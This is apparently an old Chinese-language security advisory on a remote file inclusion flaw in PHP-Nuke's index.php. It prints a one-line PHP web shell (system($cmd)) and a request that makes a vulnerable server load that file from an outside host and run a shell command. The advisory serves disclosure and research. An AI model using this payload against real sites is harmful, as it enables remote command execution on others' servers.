PHP-Nuke 执行攻击者任意命令漏洞
/ns/ld/softld/data/20020311145136.htm
涉及程序:
PHP-Nuke
描述:
PHP-Nuke 执行攻击者任意命令漏洞
详细:
发现 PHP-Nuke 存在漏洞,问题出在 index.php 的包含文件特性中,它允许包括诸如 index.php?file=file 的文件。远程攻击者利用此漏洞,能在受影响机器上执行任意代码。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
构造下面的 PHP 文件:
<?php
system($cmd);
?>
再提交这样的请求:
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
受影响系统将会执行 ls -al 命令
解决方案:
尚无